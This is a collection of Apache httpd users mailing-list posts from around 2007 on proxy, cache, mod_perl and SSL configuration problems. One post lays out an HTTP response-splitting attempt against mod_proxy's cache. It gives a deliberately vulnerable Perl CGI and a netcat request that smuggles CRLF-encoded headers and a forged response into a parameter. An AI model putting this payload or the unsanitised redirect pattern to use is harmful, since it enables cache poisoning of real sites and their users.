[EMAIL PROTECTED] apache error_log [] file does not exist and the service hung
HI, Firstly i've done a lot job bye searching the web before this thread that did't give an answer.Recently ,my apache error_log always appear such errors: #do ignore the date# Thu Mar 9 10:50:30 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif [Thu Mar 9 12:22:25 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif [Thu Mar 9 12:22:36 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif #ignore the date # And that's not the main problem the trouble is the httpd need to deal many connetions which just like such valid request,and then i httpd deamon hung in a few minutes. While i'm seeking the net for solution and the reason ,it shows that there were so many people encountered the issue but no solution.if any one knows the issue that's kind of you if you give some suggesions.Thanks in advance ! the problem just like the same as the link http://www.webmasterworld.com/apache/3379921.htm - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[EMAIL PROTECTED] Http splitting does not work with mod_proxy
Hi list.
Hope somebody will spent some time on my question :),
or point me to the right list.
Is http splitting still works in fresh version of common applications
of apache?
I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for each request.
Chain:
Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:
#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";
The attemt to exploit is:
#nc localhost 80
GET
http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0aGotcha!
HTTP/1.1
Host: test.xxx
HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)
GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx
HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html
1
However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_proxy?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).
Feel free to ask any questions to get more info.
--
Best regards.
Gleb Pakharenko.
-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
" from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
[EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
Hi Folks, I originally posted this message on the mod_perl mailing list, but I did not receive any responses, so I'm posting here in the hopes that someone can help me out. My current LAMP stack is using Apache 2.0.54 and mod_perl 2.0.0-RC4, and I'm doing something very much like what is mentioned in a previous mod_perl mailing list post from 2 years ago, the thread of which can be seen here: http://www.gossamer-threads.com/lists/modperl/modperl/79672 In summary (taking from the above posting), here's a simple flow of what we have happening: 1 - mod_cache [..got valid content in cache? If so, go to 4; if not, go to 2] 2 - mod_proxy [fetch content from origin web] 3 - mod_cache [content cacheable? If so, cache it locally] 4 - *MY FILTER* 5 - deflate Using the same modifications mentioned in the above posting, we were able to get mod_cache to run *before* mod_perl by changing mod_cache.c so that the CACHE_SAVE and CACHE_OUT filters hook in at AP_FTYPE_CONTENT_SET-2, and changing mod_perl.c so that mod_perl hooks in at AP_FTYPE_CONTENT_SET-1. This solution is mentioned at the bottom of the above posting. But now I am upgrading our LAMP stack to Apache 2.2.6 and mod_perl 2.0.3, and I'm having trouble getting the above flow to work. First off, mod_cache.c has changed so that instead of just CACHE_SAVE and CACHE_OUT, there are also CACHE_SAVE_SUBREQ and CACHE_OUT_SUBREQ. I'm not sure what the subrequests are really for, but here's what I've been doing to try to get my desired flow to work: The original Apache 2.2.6 filter order for mod_cache is: CACHE_SAVE = AP_FTYPE_CONTENT_SET+1 CACHE_SAVE_SUBREQ = AP_FTYPE_CONTENT_SET-1 CACHE_OUT = AP_FTYPE_CONTENT_SET+1 CACHE_OUT_SUBREQ = AP_FTYPE_CONTENT_SET-1 The original mod_perl 2.0.3 filter order is: MODPERL_REQUEST_OUTPUT = AP_FTYPE_RESOURCE I've modified these to be: Modified Apache 2.2.6 filter order for mod_cache: CACHE_SAVE = AP_FTYPE_CONTENT_SET-2 CACHE_SAVE_SUBREQ = AP_FTYPE_CONTENT_SET-3 CACHE_OUT = AP_FTYPE_CONTENT_SET-2 CACHE_OUT_SUBREQ = AP_FTYPE_CONTENT_SET-3 Modified mod_perl 2.0.3 filter order: MODPERL_REQUEST_OUTPUT = AP_FTYPE_CONTENT_SET-1 These modifications make it (theoretically from what I understand about the filtering order numbers and my experience with the older Apache and mod_perl) so that mod_perl runs after mod_cache, in the same way that I was able to do this for Apache 2.0.54 and mod_perl 2.0.0-RC4. However it is not working as I expected -- mod_cache appears to not be returning the body of the content before my mod_perl filter is run. So the user hits the site, mod_cache sees the page is cached, mod_perl is run but doesn't see any content, only the headers, then somewhere down the line mod_cache must be serving up the cached content after mod_perl. So, I'm stumped. Can anyone point me in the right direction? Thanks! - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[EMAIL PROTECTED] Apache 2.2.6, problem with mod_proxy: "ProxyPass|ProxyPassMatch can not have a path when defined in a location."
Hi, I am running the latest version of XAMMP provided by Apachefriends.org. The software includes Apache 2.2.6 and I am trying to configure a reverse proxy. The modules are loaded but the following lines makes Apache unhappy and complain about my configuration: ProxyPass /a/ http://localhost:8080/ ProxyPass /b/ http://localhost:/ Now when starting the Apache I do get the following error message for a syntax check (which corresponds exactly to those lines): /opt/lampp/bin/httpd -t -f /opt/lampp/etc/httpd.conf Syntax error on line 236 of /opt/lampp/etc/httpd.conf: ProxyPass|ProxyPassMatch can not have a path when defined in a location. Does anyone know what my mistake here is? I have searched the manual and googled for the problem but I didn't find any answer. Thanks! Best regards, Werner - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] Apache 2.2.6, problem with mod_proxy: "ProxyPass|ProxyPassMatch can not have a path when defined in a location."
On Thu, Nov 29, 2007 at 05:12:12PM +0100, Werner Schalk wrote: > Hi, > > I am running the latest version of XAMMP provided by Apachefriends.org. The > software includes Apache 2.2.6 and I am trying to configure a reverse > proxy. The modules are loaded but the following lines makes Apache unhappy > and complain about my configuration: > > ProxyPass /a/ http://localhost:8080/ > ProxyPass /b/ http://localhost:/ > > Now when starting the Apache I do get the following error message for a > syntax check (which corresponds exactly to those lines): > > /opt/lampp/bin/httpd -t -f /opt/lampp/etc/httpd.conf > Syntax error on line 236 of /opt/lampp/etc/httpd.conf: > ProxyPass|ProxyPassMatch can not have a path when defined in a location. > > Does anyone know what my mistake here is? I have searched the manual and > googled for the problem but I didn't find any answer. Thanks! > I would guess it's because your config actually looks something like: ProxyPass /a/ http://localhost:8080/ ProxyPass /b/ http://localhost:/ ... maybe? -- === Jim Jagielski [|] [EMAIL PROTECTED] [|] http://www.jaguNET.com/ "Great is the guilt of an unnecessary war" ~ John Adams - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
On Thu, 29 Nov 2007 11:05:27 -0500 "Adam Woodworth" <[EMAIL PROTECTED]> wrote: > In summary (taking from the above posting), here's a simple flow of > what we have happening: > > 1 - mod_cache [..got valid content in cache? If so, go to 4; if not, > go to 2] 2 - mod_proxy [fetch content from origin web] > 3 - mod_cache [content cacheable? If so, cache it locally] > 4 - *MY FILTER* > 5 - deflate That makes sense if and only if you want to repeat your-filter and DEFLATE on every request rather than cache the ready-processed contents. In principle, mod_filter enables you to control the ordering of output filters, so you could just configure the above with a FilterChain directive. The problem with that is that mod_cache does its own thing. I suspect the easiest solution may be to use mod_cache's filters but without using mod_cache's handler. I'm not sure how much work that'll involve: presumably mod_cache can largely be cloned, except for the insert-filters bit. Doing it in Perl with mod_perl should be an option. -- Nick Kew Application Development with Apache - the Apache Modules Book http://www.apachetutor.org/ - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
Hi Nick, Thanks for the response! > > 1 - mod_cache [..got valid content in cache? If so, go to 4; if not, > > go to 2] 2 - mod_proxy [fetch content from origin web] > > 3 - mod_cache [content cacheable? If so, cache it locally] > > 4 - *MY FILTER* > > 5 - deflate > > That makes sense if and only if you want to repeat your-filter and > DEFLATE on every request rather than cache the ready-processed contents. Yup, due to the nature of our product, our mod_perl filter doesn't do the same thing for each request to the same page. > directive. The problem with that is that mod_cache does its own thing. Could you ellaborate on what you mean by mod_cache doing its own thing? The problem I seem to be running into is that when my mod_perl filter runs, mod_cache has served up the headers of the file, but the content of the file is empty, so mod_perl has nothing to process. Then somewhere down the line mod_cache must serve up the rest of the file. Do you know how this might be happening, or if it's just the way mod_cache operates? Is there perhaps some interaction with mod_proxy where mod_cache only spits out the cached data at some particular point in the filter chain... I'm going to dig into mod_cache deeper now... Thanks! Adam - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] Reverse SSL Proxy Question
> I've configured a reverse SSL proxy using Apache 2.0. > > However, the application server serving the pages includes a > line that gets stripped out by the proxy. > > One thing I read was > http://www.apachetutor.org/admin/reverseproxies > and it makes mention of problems under "changing the > FPI". The solution is to, "set the doctype explicitly." > > Does anyone have any hints or workarounds? > === Al I figured it out and thought I'd post the solution. I'm using mod_proxy_html. There are directives that are included with that module which are detailed here: http://apache.webthing.com/mod_proxy_html/config.html The ProxyHTMLDoctype directive is relevant to what I was trying to do. === Al - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[EMAIL PROTECTED] SSL & Apache Scalability
Hi All, I have heard a strange story about how using 1 port for Apache SSL is not a good idea for performance. I heard if you have three sites usign the same SSL port it could really slow down performance as compared to putting those sites on separate ports for SSL. Should not each site have it's own port for SSL? Thanks, -Tony Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
After some more digging, I've figured out (mostly) what is going on. It turns out that our mod_perl filter actually does get the body content from mod_cache -- originally I thought that our filter wasn't seeing the body at all. But, the Content-Type header is missing. In cache_storage.c, around line 120 (in the 2.2.6 source code) there is this code: apr_table_unset(h->resp_hdrs, "Content-Type"); /* * Also unset possible Content-Type headers in r->headers_out and * r->err_headers_out as they may be different to what we have received * from the cache. * Actually they are not needed as r->content_type set by * ap_set_content_type above will be used in the store_headers functions * of the storage providers as a fallback and the HTTP_HEADER filter * does overwrite the Content-Type header with r->content_type anyway. */ apr_table_unset(r->headers_out, "Content-Type"); apr_table_unset(r->err_headers_out, "Content-Type"); While I'm not clear why this is happening, mod_cache is clearing out the Content-Type header from the response. So, our mod_perl filter doesn't see the content-type filter and I think that content-type gets set again by Apache somewhere after all the filters run. Since Content-Type is missing during mod_perl's running, and our mod_perl filter triggers off of Content-Type being matching certain types (normally, text/html), our filter doesn't do anything to the body because the Content-Type is missing. I was able to "fix" this by commenting out the apr_table_unset(h->resp_hdrs, ... line above. Does anyone know the affect that this could have on the rest of mod_cache/etc (any ill effects, cases where this would break something, etc?), and why exactly the Content-Type is removed in the first place my mod_cache? I see that the comments above try to explain it, but it doesn't quite make sense to me. Cheers, Adam On Nov 29, 2007 2:27 PM, Adam Woodworth <[EMAIL PROTECTED]> wrote: > Hi Nick, > > Thanks for the response! > > > > 1 - mod_cache [..got valid content in cache? If so, go to 4; if not, > > > go to 2] 2 - mod_proxy [fetch content from origin web] > > > 3 - mod_cache [content cacheable? If so, cache it locally] > > > 4 - *MY FILTER* > > > 5 - deflate > > > > That makes sense if and only if you want to repeat your-filter and > > DEFLATE on every request rather than cache the ready-processed contents. > > Yup, due to the nature of our product, our mod_perl filter doesn't do > the same thing for each request to the same page. > > > directive. The problem with that is that mod_cache does its own thing. > > Could you ellaborate on what you mean by mod_cache doing its own thing? > > The problem I seem to be running into is that when my mod_perl filter > runs, mod_cache has served up the headers of the file, but the content > of the file is empty, so mod_perl has nothing to process. Then > somewhere down the line mod_cache must serve up the rest of the file. > Do you know how this might be happening, or if it's just the way > mod_cache operates? Is there perhaps some interaction with mod_proxy > where mod_cache only spits out the cached data at some particular > point in the filter chain... > > I'm going to dig into mod_cache deeper now... > > Thanks! > Adam > - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] SSL & Apache Scalability
Tony Anecito wrote: Hi All, I have heard a strange story about how using 1 port for Apache SSL is not a good idea for performance. I heard if you have three sites usign the same SSL port it could really slow down performance as compared to putting those sites on separate ports for SSL. Should not each site have it's own port for SSL? End original message. - Where did you hear that? What is true is that you cannot do name-based virtual hosts on the same IP address with multiple domain names and have that work correctly (that subject comes up here all the time). Basically, you have to use a separate IP address for each domain name so that SSL negotiation serves the correct certificate for the domain. This is a limitation of the protocol that establishes SSL connections and there is really no legitimate way around how it works. (There is a way to "cheat" and use "wild card certificates" but that is considered bad practice and should not be done). All of these IP addresses can and should run on port 443 for SSL unless you have another compelling reason to do something different. Each of these instances will be separate ports because each IP address has its own set of ports that are not shared. In other words, port 443 on IP 192.168.1.100 is not the same as port 443 on IP 10.3.67.24 Perhaps the requirement for a unique IP address is the source of the confusion? Dragon ~~~ Venimus, Saltavimus, Bibimus (et naribus canium capti sumus) ~~~ - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [EMAIL PROTECTED] SSL & Apache Scalability
On Nov 29, 2007, at 1:58 PM, Tony Anecito wrote: I have heard a strange story about how using 1 port for Apache SSL is not a good idea for performance. I Sounds like something for Mythbusters! heard if you have three sites usign the same SSL port it could really slow down performance as compared to putting those sites on separate ports for SSL. Should not each site have it's own port for SSL? For all practical purposes, each SSL site will have its own IP address. This has much the same effect as running the sites on different ports: each virtual host will have its own listener. S. -- Sander Temme [EMAIL PROTECTED] PGP FP: 51B4 8727 466A 0BC3 69F4 B7B8 B2BE BC40 1529 24AF smime.p7s Description: S/MIME cryptographic signature
Re: [EMAIL PROTECTED] SSL & Apache Scalability
Thanks. I will sendthese email feedbacks to the person who mentioned it to me and make sure I heard it right. Many Thanks! -Tony --- Sander Temme <[EMAIL PROTECTED]> wrote: > > On Nov 29, 2007, at 1:58 PM, Tony Anecito wrote: > > > I have heard a strange story about how using 1 > port > > for Apache SSL is not a good idea for performance. > I > > Sounds like something for Mythbusters! > > > heard if you have three sites usign the same SSL > port > > it could really slow down performance as compared > to > > putting those sites on separate ports for SSL. > > > > Should not each site have it's own port for SSL? > > > For all practical purposes, each SSL site will have > its own IP > address. This has much the same effect as running > the sites on > different ports: each virtual host will have its own > listener. > > S. > > -- > Sander Temme > [EMAIL PROTECTED] > PGP FP: 51B4 8727 466A 0BC3 69F4 B7B8 B2BE BC40 > 1529 24AF > > > > Be a better sports nut! Let your teams follow you with Yahoo Mobile. Try it now. http://mobile.yahoo.com/sports;_ylt=At9_qDKvtAbMuh1G1SQtBI7ntAcJ - The official User-To-User support forum of the Apache HTTP Server Project. See http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: [EMAIL PROTECTED] " from the digest: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[EMAIL PROTECTED] strange expires problem
users,您好! I have a trouble with set expires time with apache! I want to expires statement to control the cache time,But there is a strange problem occurd! when i set ExpiresActive on ExpiresByType text/html A61 , the cache server (squid)work correctly and the expires time is 61 seconds! But if i set the time less the 61,the cache server can't cache!! ExpiresActive on ExpiresByType text/html A60 I found 60 seconds is a bottleneck whatever i use apache 2.0.X or 2.2.X , and i found it's a puzzle for me!
Re: [EMAIL PROTECTED] strange expires problem
On 30/11/2007, goommy <[EMAIL PROTECTED]> wrote: > users,您好! Uh, hi. > I have a trouble with set expires time with apache! > I want to expires statement to control the cache time,But there is a strange > problem occurd! > > when i set ExpiresActive on >ExpiresByType text/html A61 , > the cache server (squid)work correctly and the expires time is 61 seconds! This appears to be a default behaviour for squid. http://www2.tw.squid-cache.org/Versions/v2/2.6/cfgman/minimum_expiry_time.html -- noodl
